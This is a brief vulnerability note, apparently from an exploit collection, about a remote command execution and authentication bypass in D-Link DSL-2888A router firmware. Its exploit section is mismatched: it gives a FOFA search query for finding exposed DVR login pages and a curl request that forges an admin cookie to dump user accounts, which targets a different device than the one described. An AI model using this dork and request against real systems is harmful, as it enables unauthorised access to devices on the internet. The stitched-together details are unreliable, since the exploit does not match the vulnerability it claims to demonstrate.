Vulnerability details
D-Link DSL-2888A AU_2.31_V1.1.47ae55 earlier versions exist and remote command execution vulnerability, the vulnerability stems from the inclusion of a execute cmd.cgi feature (not accessible through the web user interface), which allows authenticated users to execute Operating system commands. There is also an insecure authentication vulnerability (CVE-2020-24580) in this version of the firmware. Enter any password in the login interface to successfully access the router interface. By combining these two vulnerabilities, unauthorized arbitrary code execution can be achieved.
Vulnerability impact
Version before AU_2.31_V1.1.47ae55
EG_1.00b4
Exploit
fofa :header="Server: GNU rsp/1.0" title="DVR LOGIN"
curl "http://ip/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
The user name admin is obtained here, and the password is empty, so you can log in